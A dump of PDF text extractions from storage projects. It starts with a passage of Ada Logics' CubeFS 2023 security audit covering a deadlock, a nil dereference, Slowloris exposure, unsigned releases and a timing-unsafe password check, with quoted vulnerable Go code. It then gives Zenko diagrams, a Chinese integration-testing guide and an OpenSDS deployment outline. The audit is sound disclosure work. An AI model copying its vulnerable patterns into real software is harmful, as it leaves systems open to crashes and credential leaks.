getDisk(id)\n276 if !ok {\n277 return nil, apierrors.ErrCMDiskNotFound\n278 }\n279\n280 diskInfo.lock. RLock()\n281 defer diskInfo.lock. RUnlock()\n282 newDiskInfo := *(diskInfo.info)\n283 // need to copy before return, or the higher level may change the disk info \nby the disk info pointer\n284 return &(newDiskInfo), nil\n285}\nAn attacker could trigger the deadlock by removing disks that the caller of\napplyAdminUpdateVolumeUnit expects to exist.\nBlobnode\nThe PutShard method of the ShardsBuf type is susceptible to a deadlock from a missing lock\nrelease in case of a wrong size comparison.\nPutShard performs a size comparison as part of a sanity check and returns an error if the data\nsize does not match the expected size. When doing so, PutShard does not unlock the ShardsBuf .\nOn line 293 below, PutShard locks the ShardsBuf and unlocks it on line 312. On line 309,\nPutShard performs the sanity check if int64(len(shards.shards[bid].data)) != size { and\nreturns errShardSizeNotMatch on line 310 if it fails. Before returning errShardSizeNotMatch ,\nPutShard does not unlock the ShardsBuf , and it remains locked a\u0000 er returning:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/blobstore/blobnode/work_shard_rec\nover.go#L292-L324\n292func (shards *ShardsBuf) PutShard (bid proto.BlobID, input io.Reader) error {\n293 shards.mu. Lock()\n294\n295 if _, ok := shards.shards[bid]; !ok {\n296 shards.mu. Unlock()\n297 return errBidNotFoundInBuf\n298 }\n299 if shards.shards[bid].size == 0 {\n300 shards.mu. Unlock()\n301 return nil\n302 }\n303 if shards.shards[bid].ok {\n304 shards.mu. Unlock()\n305 return errBufHasData\n306 }\n307\n308 size := shards.shards[bid].size\n309 if int64(len(shards.shards[bid].data)) != size {\n310 return errShardSizeNotMatch\n311 }\n312 shards.mu. Unlock()\n313\n314 // read data from remote is slow,so optimize use of lock\n315 _, err := io. ReadFull (input, shards.shards[bid].data)\n316 if err != nil {\n317 return err\n318 }\nCubeFS 2023 Security Audit\n28\nAda Logics Ltd319\n320 shards.mu. Lock()\n321 shards.shards[bid].ok = true\n322 shards.mu. Unlock()\n323 return nil\n324}\nCubeFS 2023 Security Audit\n29\nAda Logics LtdPossible nil-dereference from unmarshalling double\npointer\nSeverity: Low\nStatus: Fixed\nId: ADA-CUBEFS-ASBDVGA\nComponent: ObjectNode\nUnmarshalling into a double-pointer can result in nil-pointer dereference if the raw bytes are\nNULL .\nCubeFS has a case that would trigger a nil-pointer dereference and crash the CubeFS\nObjectNode:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/objectnode/acl_api.go#L186-L201\n186func getObjectACL (vol *Volume, path string, needDefault bool) (*AccessControlPolicy, \nerror) {\n187 xAttr, err := vol. GetXAttr (path, XAttrKeyOSSACL)\n188 if err != nil || xAttr == nil {\n189 return nil, err\n190 }\n191 var acp *AccessControlPolicy\n192 data := xAttr. Get(XAttrKeyOSSACL)\n193 if len(data) > 0 {\n194 if err = json. Unmarshal (data, &acp); err != nil {\n195 err = xml. Unmarshal (data, &acp)\n196 }\n197 } else if needDefault {\n198 acp = CreateDefaultACL (vol.owner)\n199 }\n200 return acp, err\n201}\nOn line 194, getObjectACL unmarshals into a double pointer. acp is declared on line 191 as a\npointer and is referenced with a pointer on line 194. If data on line 194 is the byte sequence\nequal to NULL , acp will be nil on line 194 and return nil, nil .\nThis behaviour will trigger a nil-pointer dereference on 145 in the below code snippet:\nhttps://github.com/cubefs/cubefs/blob/6a0d5fa45a77\u000020c752fa9e44738bf5d86c84bd/objectn\node/acl_handler.go#L110-L153\n1func (o *ObjectNode) getObjectACLHandler (w http.ResponseWriter, r *http.Request) {\n2 var (\n3 err error\n4 erc *ErrorCode\n5 )\n6 defer func() {\n7 o.errorResponse (w, r, err, erc)\n8 }()\n9\n10 param := ParseRequestParam (r)\n11 if param.Bucket() == \"\" {\n12 erc = InvalidBucketName\n13 return\n14 }\n15 if param.Object() == \"\" {\n16 erc = InvalidKey\n17 return\n18 }\n19\n20 var vol *Volume\n21 if vol, err = o. getVol(param.bucket); err != nil {\n22 log.LogErrorf (\"getObjectACLHandler: load volume fail: requestID(%v) \nvolume(%v) err(%v)\" ,\n23 GetRequestID (r), param.bucket, err)\nCubeFS 2023 Security Audit\n30\nAda Logics Ltd24 return\n25 }\n26 var acl *AccessControlPolicy\n27 if acl, err = getObjectACL (vol, param.object, true); err != nil {\n28 log.LogErrorf (\"getObjectACLHandler: get acl fail: requestID(%v) \nvolume(%v) path(%v) err(%v)\" ,\n29 GetRequestID (r), param.bucket, param.object, err)\n30 if err == syscall.ENOENT {\n31 erc = NoSuchKey\n32 }\n33 return\n34 }\n35 var data [] byte\n36 if data, err = acl. XmlMarshal (); err != nil {\n37 log.LogErrorf (\"getObjectACLHandler: xml marshal fail: requestID(%v) \nvolume(%v) path(%v) acl(%+v) err(%v)\" ,\n38 GetRequestID (r), param.bucket, param.object, acl, err)\n39 return\n40 }\n41\n42 writeSuccessResponseXML (w, data)\n43 return\n44}\nOn line 136 getObjectACLHandler invokes getObjectACL . If this returns nil, nil , then a nil-\npointer dereference will be triggered on line 145.\nMitigation\nUnmarshal into a single pointer instead of a double pointer.\nCubeFS 2023 Security Audit\n31\nAda Logics LtdPotential Slowloris attacks\nSeverity: Low\nStatus: Fixed\nId: ADA-CUBEFS-AMK23ghJVHJ\nComponent: AuthNode\nSlowloris is a type of attack where an attacker opens a connection between their controlled\nmachine and the victim's server. Once the attacker has opened the connection, they keep it\nopen for as long as possible. They will do the same with a large number of controlled machines\nto hog the available connections and prevent other users from accessing the service. As such,\nthe victim's server stays up but remains busy from processing the attacker's requests and\nbecomes unavailable to legitimate users.\nAn attacker can exploit a Slowloris issue by identifying execution paths in their target\napplication that cause it to take longer time to return from, and the attacker can then send\nrequests that force the application into these. The fact that Cubefs's Master server is susceptible\nto a Slowloris attack does not mean that it is easily exploitable.AuthNode\nhttps://github.com/cubefs/cubefs/blob/9c9f0bad65fc4a904160\u000022cdaba2d9d6becd7c/authnode/http_server.go#L37-L44\n37 srv := &http.Server{\n38 Addr: colonSplit + m.port,\n39 TLSConfig: cfg,\n40 }\n41 if err := srv. ListenAndServeTLS (\"/app/server.crt\" , \"/app/server.key\" ); \nerr != nil {\n42 log.LogErrorf (\"action[startHTTPService] failed,err[%v]\" , err)\n43 panic(err)\n44 }\nMaster\nThe root cause of the Master server Slowloris issue is that is does not declare a timeout. On line\n50 below, startHTTPService declares the HTTP Server with address and handler but does not\ndeclare a timeout.\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/master/http_server.go#L37-L64\n37func (m *Server) startHTTPService (modulename string, cfg *config.Config) {\n38 router := mux. NewRouter ().SkipClean (true)\n39 m.registerAPIRoutes (router)\n40 m.registerAPIMiddleware (router)\n41 if m.cluster.authenticate {\n42 m.registerAuthenticationMiddleware (router)\n43 }\n44 exporter. InitWithRouter (modulename, cfg, router, m.port)\n45 addr := fmt. Sprintf(\":%s\", m.port)\n46 if m.bindIp {\n47 addr = fmt. Sprintf(\"%s:%s\" , m.ip, m.port)\n48 }\n49\n50 var server = &http.Server{\n51 Addr: addr,\n52 Handler: router,\n53 }\n54\n55 var serveAPI = func() {\n56 if err := server. ListenAndServe (); err != nil {\n57 log.LogErrorf (\"serveAPI: serve http server failed: err(%v)\" , err)\n58 return\n59 }\n60 }\n61 go serveAPI ()\nCubeFS 2023 Security Audit\n32\nAda Logics Ltd62 m.apiServer = server\n63 return\n64}\nThe server does not have a timeout at all because the server has specified neither ReadTimeout\nnor ReadHeaderTimeout . This grants an attacker ample flexibility and possibilities for getting the\nserver to hang. Note that the server also does not have write timeouts, which adds to an\nattacker's possibilities of triggering this.\nBelow, we enumerate all other HTTP servers that do not specify timeouts. We do not include\ntests and examples.\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/cmd/cmd.go#L135-L144\n135 if mod.graceful {\n136 programEntry := func(state *graceful.State) {\n137 router, handlers := mod. SetUp()\n138\n139 httpServer := &http.Server{\n140 Addr: cfg.BindAddr,\n141 Handler: reorderMiddleWareHandlers (router, lh, cfg.BindAddr, \ncfg.Auth, handlers),\n142 }\n143\n144 log.Info(\"server is running at:\" , cfg.BindAddr)\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/cmd/cmd.go#L171-L174\n171 httpServer := &http.Server{\n172 Addr: cfg.BindAddr,\n173 Handler: reorderMiddleWareHandlers (router, lh, cfg.BindAddr, cfg.Auth, \nhandlers),\n174 }\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/common/ra\u0000 server/transp\nort.go#L70-L73\n70 tr.httpSvr = &http.Server{\n71 Addr: fmt. Sprintf(\":%d\", port),\n72 Handler: router,\n73 }\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/common/consul/consul.go\n#L216-L227\n216 srv = &http.Server{}\n217 srv.Addr = ln. Addr().String()\n218 port = ln. Addr().(*net.TCPAddr).Port\n219 log.Info(\"start health check server on: \" , srv.Addr)\n220 http.HandleFunc (patten, healthCheck)\n221 go func() {\n222 httpError := srv. Serve(ln.(*net.TCPListener))\n223 if httpError != nil && httpError != http.ErrServerClosed {\n224 log.Fatalf(\"health server HTTP error: \" , httpError)\n225 }\n226 log.Info(\"health check server exit\" )\n227 }()\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/objectnode/server.go#L463-L473\n463 var server = &http.Server{\n464 Addr: \":\" + o.listen,\n465 Handler: router,\n466 }\n467\n468 go func() {\n469 if err = server. ListenAndServe (); err != nil {\n470 log.LogErrorf (\"startMuxRestAPI: start http server fail, err(%v)\" , err)\n471 return\n472 }\n473 }()\nCubeFS 2023 Security Audit\n33\nAda Logics LtdMitigation\nAdd timeouts when declaring the servers.\nCubeFS 2023 Security Audit\n34\nAda Logics LtdReleases are not signed\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-NJb32hjJBN\nComponent: CubeFS\nCubeFS releases are not signed, with keys available alongside releases. Signing releases and\nallowing consumers to verify them mitigates supply-chain risks.\nA tool like Cosign makes the signing process easy and low-e\u0000 ort and keeps the overhead for\nconsumers low to verify signatures. These signatures should be available with releases.\nMitigation\nRelease signing by way of Cosign can be adopted by way of the o\u0000icial Cosign Github Action:\nhttps://github.com/marketplace/actions/cosign-installer.\nCubeFS 2023 Security Audit\n35\nAda Logics LtdSecurity Disclosure Email Does Not Work\nSeverity: Low\nStatus: Fixed\nId: ADA-CUBEFS-vc34CGVVJB\nComponent: Security Policy\nDuring the audit, Ada Logics attempted to disclose a finding to the email address listed in\nCubeFS's security disclosure guidelines:\nhttps://github.com/cubefs/cubefs/blob/master/SECURITY.md. The email bounced, and the\nCubeFS team did not receive the security finding.\nThis could prevent or discourage community members from contributing to CubeFS's security\nposture. We recommend regularly ensuring that communication channels for responsible\nsecurity disclosures are tested.\nDuring the security audit, the CubeFS maintainers enable disclosures through the Github\ninterface.\nCubeFS 2023 Security Audit\n36\nAda Logics LtdTiming attack can leak user passwords\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-Jh2iu3423b\nComponent: Master\nSummary\nCubeFS uses a string comparison for user passwords that is prone to timing attacks. A timing\nattack is a side-channel attack whereby an attacker observes the response time from an\napplication and can deduce the number of matching characters in their payload against the\ncontrol string.Details\nCubeFS password validation routine:\nhttps://github.com/cubefs/cubefs/blob/fdfa176a97e0fbb57c953e2b4a3aebe329e2a631/master/gapi_user.go#L337-L356\n337func (s *UserService) validatePassword (ctx context.Context, args struct {\n338 UserID string\n339 Password string\n340}) (*proto.UserInfo, error) {\n341 ui, err := s.user. getUserInfo (args.UserID)\n342 if err != nil {\n343 return nil, err\n344 }\n345\n346 ak, err := s.user. getAKUser (ui.AccessKey)\n347 if err != nil {\n348 return nil, err\n349 }\n350\n351 if ak.Password != args.Password {\n352 log.LogWarnf (\"user:[%s] login pass word has err\" , args.UserID)\n353 return nil, fmt.Errorf(\"user or password has err\" )\n354 }\n355 return ui, nil\n356}\n... is prone to a timing/side channel attack due to the way CubeFS compares the two passwords\non this line:\nhttps://github.com/cubefs/cubefs/blob/fdfa176a97e0fbb57c953e2b4a3aebe329e2a631/master/gapi_user.go#L351\n351 if ak.Password != args.Password {\nFor similar issues in the Go ecosystem, which include technical discussions about timing\nattacks and mitigation, see:https://github.com/advisories/GHSA-mq6f-5xh5-hgcf\nhttps://github.com/gin-gonic/gin/issues/3168\nImpact\nThis vulnerability allows unauthenticated users to escalate privileges to the level corresponding\nto the highest privileged user in the UserService. If there are users with root permissions being\nauthenticated by validatePassword , this is the possible level of privilege escalation.\nAll CubeFS users using the Master UserService s validatePassword to validate user passwords are\nimpacted by this.\nCubeFS 2023 Security Audit\n37\nAda Logics Ltd" } ]
{ "category": "Runtime", "file_name": "XDM_cluster_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "Server 1 (Master) XDM\nServicesCluster\nXDM\nServicesXDM\nServices\nServer 2\nServer 3XDM\nServices\nXDM\nServicesXDM\nServices\nXDM\nServices\nXDM\nServicesXDM\nServicesCLI\nOrbitXDM\nInstance\nAzureGCPClientK8S\nK8S\nK8SRING\nAWS\n" } ]
{ "category": "Runtime", "file_name": "集成测试方法.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "© XXX Page 1 of 8如何做集成测试© XXX Page 2 of 81.说明\n1.1 方法\n1.2 目标\n1.3 集成测试应考虑问题\n2.集成测试内容\n2.1 功能性测试\n2.2 异常测试\n2.3 规模测试\n2.4 并发/压力测试\n3.用例设计方法\n3.1 设计原则\n3.2 用例设计相关理论\n3.3 用例模板\n3.4 设计步骤\n3.4.1.模块分析\n3.4.2.接口分析\n3.4.3.条件筛选\n3.4.4.用例设计\n3.4.5.场景设计\n3.4.6.代码实现\n3.4.7.迭代补充\n1.说明\n集成测试是在单元测试的基础上,测试 在将所有的软件单元按照概要设计规格说明的要求组装成模块、子系统或系统的过程中各部分工作是否达到或实现相应技术指标 及要求的活动。\n1.1 方法\n集成测试的方法有很多种,但是归纳起来主要有两种。一种是一次性将所有单元组装起来进行测试的“大棒”模式,一种是一层一层累加递增式的测试。\n1.2 目标\n集成测试的目标 是按照设计要求使用那些通过单元测试 的构件来构造程序结构。单个模块具有高质量但不足以保证整个系统的质量 。有许多隐蔽的失效是高质量模块间发生非预期交互而产生的。\n集成测试是确保各单元组合在一起后能够按既定意图协作运行,并确保增量的行为正确。它所测试的内容包括单元间的接口以及集成后的功能。\n1.3 集成测试应考虑问题\n       1、在把各个模块连接起来的时候,穿越模块接口的数据是否会丢失;\n  2、各个子功能组合起来,能否达到预期要求的父功能;\n  3、一个模块的功能是否会对另一个模块的功能产生不利的影响;\n  4、全局数据结构是否有问题;© XXX Page 3 of 8  5、是采用何种系统组装方法来进行组装测试;\n  6、组装测试过程中连接各个模块的顺序;\n  7、模块代码编制和测试进度是否与组装测试的顺序一致;\n  8、测试过程中是否需要专门的硬件设备;\n  9、单个模块的误差积累起来,是否会放大,从而达到不可接受的程度。\n  因此,单元测试后,有必要进行集成测试,发现并排除在模块连接中可能发生的上述问题,最终构成要求的软件子系统或系统。对子系统,集成测试也叫部件测试。\n2.集成测试内容\n这里介绍我们的模块做集成测试时主要要测试的内容:\n2.1 功能性测试\n站在使用者的角度,对模块提供的功能进行完备的测试。在做功能测试前需要设计充分的测试用例,考虑各种系统状态和参数输入下模块依然能够正常工作,并返回预期的结果。\n在这一过程中,需要有一种科学的用例设计方法,依据这种方法可以充分考虑各种输入场景,保证测试功能不被遗漏,同时能够以尽可能少的用例和执行步骤完成测试过程。\n常规意义上的功能测试一般是黑盒测试,对内部的实现不太关注,但是为了充分考虑各种参数取值场景并减少不必要的条件组合用例,对模块的集成测试需要对模块内部实现进行了解,采用灰盒测试。\n具体的用例设计方法见 一节。 用例设计方法\n2.2 异常测试\n异常测试是有别于功能测试和性能测试又一种测试类型,通过异常测试,可以发现由于系统异常、依赖服务异常、应用本身异常等原因引起的性能瓶颈,提高系统的稳定性。\n \n常见的异常如:磁盘错误、网络错误、数据出错、程序重启等等。\n2.3 规模测试\n测试模块在一定规模下是否能够正常工作,是否会出现异常或者崩溃,观察系统资源的使用情况。例如测试打开大量的文件是否会出错,内存占用是否会过大。\n2.4 并发/压力测试\n功能性的测试更多是单线程的测试,还需要在并发场景下对模块进行测试,观察在并发场景下是否能够正常工作,逻辑或者数据是否会出现错误。\n考虑并发度时,使用较大的压力来测试,例如平时使用的2倍、10倍或更大的压力。\n3.用例设计方法© XXX Page 4 of 8测试用例是为验证程序是否符合特定系统需求而开发的测试输入、执行条件和预期结果的集合,其组织性、功能覆盖性、重复性的特点能够保证测试功能不被遗漏。由于测试用例往往涉及多重选择、循环嵌套,不\n同的路径数目可能非常大,所以必须精心设计使之能达到最佳的测试效果。\n3.1 设计原则\n这里首先需要考虑从什么样的角度去思考用例的设计,一种是以接口的角度,根据接口划分来设计用例;另一种是以使用场景的角度来设计,例如快照过程中或者克隆过程中的操作。\n根据接口来设计用例\n优点:\n1.可以根据输入不同的接口参数,产生不同的预期来设计用例,考虑比较完整地考虑各种调用情况;\n缺点:\n1.这种方法比较抽象,不知道在什么样的场景下会出现这样的用例;\n2.根据接口提供的功能来设计用例,有时候难以考虑一些特殊场景下功能上的缺陷。\n根据场景来设计用例\n优点:\n1.用例审核者能比较容易理解各组用例出现的场景;\n2.可以测试出功能设计之初未考虑到的一些场景。\n缺点:\n1.无法很好地证明用例覆盖是否充分。\n \n两种方式各有优缺点,可以考虑将两种方式结合起来,用接口方式来设计用例,然后用场景方式来组织用例的执行序列。\n根据接口进行设计可以比较清晰地评估用例覆盖是否完全,然后以场景方式来执行这些用例,对执行过的用例就打钩记录;这样可以很清楚的知道哪些用例执行了哪些没执行,帮助发现没有想到的场景;\n此外还能通过特殊的场景帮助发现接口功能是否考虑充分,两种方式可以互补帮助发现更多问题。\n3.2 用例设计相关理论\n测试用例的设计有许多的理论指导,这里列出几个常用的理论介绍。我们的用例设计会参考但不限于以下几种方法。\n组合测试\n一个接口或功能或系统需要用到多个参数,而参数又有不同的取值,不同参数取值的组合会影响产生不同结果,但是这个组合数可能非常大,导致用例数过多。\n举例说明:假设我们需要验证IE在不同硬件配置的PC上的兼容性测试,且经过数据统计,主要用户占比的PC信息如下图所示:© XXX Page 5 of 8\n并且需要验证的IE版本如下图所示:\n在这种场景下,要达到对参数的所有取值组合的覆盖,共需要3*3*4*2*4*4=1152条用例,这种情况称为组合爆炸。\n而组合测试的目的,抽象的说就是为组合爆炸提供一种解决方案,简单地说就是在保证错误检出率的前提下采用较少的测试用例生成方法,它将被测系统或被测系统的模块抽象成一个受到多个因素影响的系统,并\n提取出每个因素的可能取值,结合组合测试方法,生成最终的测试用例。常用的组合测试方法包括:\n1、两因素组合测试(也称配对测试、全对偶测试)\n生成的测试集可以覆盖任意两个变量的所有取值组合。在理论上,该用例集可以暴露所有由两个变量共同作用而引发的缺陷。\n2、多因素(t-way,t>2)组合测试\n生成的测试集可以覆盖任意t个变量的所有取值组合。在理论上,该测试用例集可以发现所有t个因素共同作用引发的缺陷。\n3、基于选择的覆盖\n要满足基于选择的覆盖,第一步是选出一个基础的组合,且基础组合中包含每个参数的基础值,建议选择最常用的有效值作为基础值。基于基础组合,每次只改变一个参数值,来生成新的组合用例。\n关于组合测试的理论和方法,这里不做具体展开。\n等价类划分\n把全部输入数据合理地划分为若干等价类,在每一个等价类中取一个数据作为测试的输入条件,就可以用少量代表性的测试数据取得较好的测试结果。\n有效等价类:指对于程序的规格说明来说是合理的、有意义的输入数据构成的集合。\n无效等价类:与有效等价类的定义恰巧相反。\n设计测试用例时,要同时考虑这两种等价类。因为软件不仅要能接收合理的数据,也要能经受意外的考验。这样的测试才能确保软件具有更高的可靠性。\n划分等价类的方法\n下面给出六条确定等价类的原则:\n  1、在输入条件规定了取值范围或值的个数的情况下,则可以确立一个有效等价类和两个无效等价类。\n  2、在输入条件规定了输入值的集合或者规定了“必须如何”的条件的情况下,可确立一个有效等价类和一个无效等价类。\n  3、在输入条件是一个布尔量的情况下,可确定一个有效等价类和一个无效等价类。\n  4、在规定了输入数据的一组值(假定n个),并且程序要对每一个输入值分别处理的情况下,可确立n个有效等价类和一个无效等价类。\n  5、在规定了输入数据必须遵守的规则的情况下,可确立一个有效等价类(符合规则)和若干个无效等价类(从不同角度违反规则)。\n  6、在确知已划分的等价类中各元素在程序处理中的方式不同的情况下,则应再将该等价类进一步的划分为更小的等价类。\n边界值分析\n在最小值、略高于最小值、正常值、略低于最大值和最大值处取输入变量值\n例如:涉及两个变量的函数x1,x2© XXX Page 6 of 8表示方法min、min+、nom、max-、和max\nX1的取值x1min,x1min+,x1nom,x1max-,x1max\nX2的取值x2min,x2min+,x2nom,x2max,x2max\n其他方法\n状态迁移法、 流程分析法、 判定表分析法、 因果图法等等。\n总结\n前面三种方法是常用的用例设计方法,并且各种方法之间可以结合使用,根据实际的场景选用合适的设计方法。\n在对接口或者系统做用例设计时,需要根据参数的不同取值组合来设计用例,可以覆盖所有的情况。但是如果考虑所有的组合,在很多情况下用例集会非常庞大,这种情况下就要使用组合测试来减少用例数,同时\n保证充分的覆盖率。\n此外有些接口的参数取值并不是离散的,这种情况下可以使用等价类划分或者边界值分析法来划分参数取值。举例来说,对于DataStore的WriteChunk接口的sn来说,sn可以为大于0的任意整数,利用等价类划分法\n,可以将sn与chunk的sn和correctedSn对比,划分为大于chunk的sn、等于chunk的sn和小于chunk的sn跟大于chunk的correctedSn、等于chunk的correctedSn和小于chunk的correctedSn的条件组合。\n3.3 用例模板\n用例设计可以遵循GWT(Given-When-Then)的模式来写,Given表示给定的前提条件,When表示要发生的操作,Then表示预期的结果。\n如果要覆盖所有的用例,那么势必要列出所有的前提条件,然后在特定的前提下,需要列出所有可能发生的操作。\n编号 Given When Then 备注 是否执行\n1       \n单元测试\n集成测试\n2       \n单元测试\n集成测试\n3       \n单元测试\n集成测试\n3.4 设计步骤\n整个设计可以按照以下步骤来执行:\n3.4.1.模块分析\n首先需要了解要测试模块以及组成此模块的其余子模块的功能,可以通过设计文档也可以通过代码实现来了解。© XXX Page 7 of 8需要知道这一模块负责的主要功能,模块维护的一些状态,模块记录了哪些信息等等。\n以DataStore为例,首先DataStore下组合了LocalFIleSystem和ChunkfilePool两个子模块,对外提供将对chunk的操作转化为对本地文件的操作的功能;\n该模块主要管理chunk文件及其快照文件,维护chunk文件的属性和数据。\n3.4.2.接口分析\n对接口提供的功能、输入参数、输出结果、实现原理等进行分析,根据接口内部逻辑和模块维护的状态对各参数进行等价类划分。\n一般来说输入参数在内部都会存在一些判断逻辑,这些判断的逻辑就可作为等价类划分的依据;一个参数可以与不同的状态进行对比分成多个条件项,不同条件项可以根据对比结果分类分成多个具体的条件。\n以DataStore的ReadChunk接口为例,主要包含了id、sn、offset、length这些参数,id这个参数对应了一个chunk的状态,即chunk是否存在、快照是否存在、是否为clone\nchunk,从而三个条件项,每个条件项有根据是否成立分成两个条件;\nsn作用是跟chunk的sn和correctedsn进行对比分成两个条件项,对比结果可以划分为sn>chunkinfo.sn、sn<chunkinfo.sn、sn==chunkinfo.sn(边界值)三组条件,以及和correctedSn对比的三组条件;\noffset、length可以与chunksize对比作为一个条件项,判断读取区域chunk之前是否写过又作为一个条件项。\n3.4.3.条件筛选\n如果要完全覆盖情况,需要将上面列出来的各组条件项进行全排列组合,这样用例数会非常大。但是这也只有在各条件项之间完全独立的情况下才可能出现,在实际设计时,各条件项之间存在着各种关系,我们可\n以利用这种关系来减少用例数。\n常见的一些关系:\n依赖:\n某一条件项A存在的前提依赖于另一条件项B的某一条件m成立,这样一来就可以过滤A的各条件与m的组合。\n例如DataStore的ReadChunk接口,快照是否存在这一条件项依赖于chunk存在的前提,否则这一条件项就没有意义。\n互斥:\n有些条件项之间是互斥的,必然不会一起出现的,这样就可以过滤掉这两个条件项的条件之间的组合。\n例如DataStore的ReadChunk接口,快照存在,则chunk必然不是clone chunk;chunk如果是clone chunk就必然不存在快照。\n等价处理\n有些条件项不同条件在接口中的处理方式是一样的,这种情况下可以去除这一条件项,或者写用例的时候可以穿插着用不同条件来写。\n例如ReadChunk接口,对于是否为clone chunk,接口处理是一样的,所以这个条件项实际上没什么意义;可以去掉,但是对这个接口来说比较好的方法是将这两个条件当成一个条件与其他条件进行组合,\n但是组合时可以随机的使用clone chunk或普通chunk作为这个条件,这样可以减少一半的用例。\n条件阻断\n代码的实现逻辑中,条件都是顺序执行的,某一条件符合的情况下,才会判断下一个条件,如果某一条件成立情况下函数返回了,后面的判断就必然不会继续下去了,那么在这一条件成立情况下,与后面条件的组\n合就可以过滤掉。\n但是这个需要对代码逻辑要比较了解,对于复杂的判断逻辑会较难处理。这里原则上认为对于比较简单的,且逻辑顺序基本不会发生变化的,可以应用这条方法。© XXX Page 8 of 8例如DataStore的WriteChunk接口,如果offset+length>chunksize,就一定会返回OutOfRangeError,那么在这种情况其实只需要测一组就可以了,与其他条件的组合可以过滤掉。\n上面列出的是常见的一些筛选用例的办法,其他还可以根据实际的一些情况进行筛选。\n3.4.4.用例设计\n当上面的分析做完以后就可以开始写用例了,用例的模板可以参照上面的表格。\n写用例时尽量将相同功能或接口的用例写在一起,相同Given条件下的写一起,然后一次改变一个条件(除非要利用组合测试)。\nGiven里给出前提条件,例如DataStore是对chunk的操作,前提条件就是当前chunk的状态;When就是输入参数的条件组合;Then就是预期的结果。\n3.4.5.场景设计\n有了上面的用例后,在考虑实际的场景来设计执行步骤。一个场景里面会包含不同接口的使用,但是每次调用必然能对应到某一条用例,如果没找到对应用例,那就是用例设计有遗漏,需要补充用例。\n3.4.6.代码实现\n根据场景设计中的步骤来写代码,然后检查是否与用例预期结果一致。用例跑完通过后,在对应的用例后面打钩记录。\n3.4.7.迭代补充\n检查用例是否都执行了,如果没有执行分析是不是场景有遗漏,需要进行补充。原则上来说,用例是需要百分百覆盖的。" } ]
{ "category": "Runtime", "file_name": "Zenko_arch.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "OrbitCloudserverTransient\nSource \nAWS\nGCP\nAzureS3C/RINGZenko\nClient\nZenko \nNFS\nBackbeat\nKa�a\nqueuebucket & object \nnamespace\nMongoDBClouds( d a t a a n d\nm e t a d a t a )CLINFSsproxyd" } ]
{ "category": "Runtime", "file_name": "OpenSDS Bali POC Deployment.pdf", "project_name": "Soda Foundation", "subcategory": "Cloud Native Storage" }
[ { "data": " \n OpenSDS Bali POC Deployment January 2019 Author: OpenSDS OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT ii Document Revision History Version Date Comments 0.1 7/12/2018 Initial revision. 0.2 12/22/2018 Updated to Bali version. 0.3 1/23/2019 Add ports info 0.4 1/24/2019 Updated ports info Related Documents Author Documents OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT iii Table of Contents 1 System requirements............................................................................................ 1 1.1 Hardware .................................................................................................................................. 1 1.2 Software .................................................................................................................................... 1 \n OS ....................................................................................................................................... 1 2 Installation............................................................................................................. 1 2.1 Prerequisite for two hosts ....................................................................................................... 2 \n Packages ............................................................................................................................. 2 \n Golang ................................................................................................................................ 2 \n Docker ................................................................................................................................ 3 \n Docker-compose ................................................................................................................ 3 \n Ansible ............................................................................................................................... 3 \n DRBD ................................................................................................................................. 4 2.2 Deployment on host 1 .............................................................................................................. 4 \n OpenSDS Deployment ...................................................................................................... 4 2.2.1.1 Download opensds-installer code .................................................................................... 4 2.2.1.2 Configure OpenSDS cluster variables ............................................................................ 4 2.2.1.2.1 System environment ............................................................................................. 4 2.2.1.2.2 LVM ....................................................................................................................... 5 2.2.1.2.3 Ceph ....................................................................................................................... 5 2.2.1.2.4 Cinder .................................................................................................................... 5 2.2.1.3 Check if the hosts can be reached ..................................................................................... 6 2.2.1.4 Run opensds-ansible playbook to start deploy ................................................................. 6 \n Configure FusionStorage Backend ................................................................................... 6 \n Configure Dorado Storage Backend ................................................................................. 7 \n Configure Host-based replication .................................................................................... 9 \n Kubernetes Local Cluster Deployment .......................................................................... 10 2.2.5.1 Install Etcd .................................................................................................................. 10 2.2.5.2 kubernetes local cluster................................................................................................. 10 \n CSI Plugin Deployment .................................................................................................. 10 2.2.6.1 Download nbp source code ........................................................................................... 10 2.2.6.2 Configure CSI Plugin configmap .................................................................................. 10 OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT iv 2.2.6.3 Install CSI Plugin ........................................................................................................ 11 2.3 Deployment on host 2 ............................................................................................................ 11 \n OpenSDS Deployment .................................................................................................... 11 2.3.1.1 Download opensds-installer code .................................................................................. 11 2.3.1.2 Configure OpenSDS cluster variables .......................................................................... 11 2.3.1.2.1 System environment ........................................................................................... 11 2.3.1.2.2 LVM ..................................................................................................................... 12 2.3.1.2.3 Ceph ..................................................................................................................... 12 2.3.1.2.4 Cinder .................................................................................................................. 12 2.3.1.3 Check if the hosts can be reached ................................................................................... 13 2.3.1.4 Run opensds-ansible playbook to start deploy ............................................................... 13 \n Configure FusionStorage Backend ................................................................................. 13 \n Configure Dorado Storage Backend ............................................................................... 14 \n Configure Host-based replication .................................................................................. 15 \n Devstack(Openstack) Deployment ................................................................................. 16 2.3.5.1 Install OpenStack using devstack ................................................................................. 16 \n Configure Cinder Compatible API in OpenSDS ........................................................... 17 2.3.6.1 Installation .................................................................................................................. 17 2.4 Check OpenSDS ...................................................................................................................... 18 \n Check OpenSDS CLI Tool ............................................................................................... 18 \n Check OpenSDS Dashboard ........................................................................................... 18 3 Uninstallation ..................................................................................................... 19 4 Appendix ............................................................................................................. 